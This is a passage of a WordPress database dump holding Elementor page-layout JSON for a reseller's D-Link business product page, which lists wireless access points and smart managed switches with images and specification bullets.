]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7557,3408,'_elementor_version','2.5.14'),(7558,3408,'_elementor_edit_mode','builder'),(7561,3409,'_wp_page_template','template-fullwidth.php'),(7562,3409,'_elementor_template_type','post'),(7563,3409,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"High-speed wireless performance with 300 Mbps wireless signal rates\\n\\nSupport Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications\\n\\nGigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client\\n\\nSupport Inbuilt Radius server, Network Access protection (NAP)\\n\\nEquipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation\\n\\nSupport Central WiFi Manager to configure and manage multiple AP\\n\\n<center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" 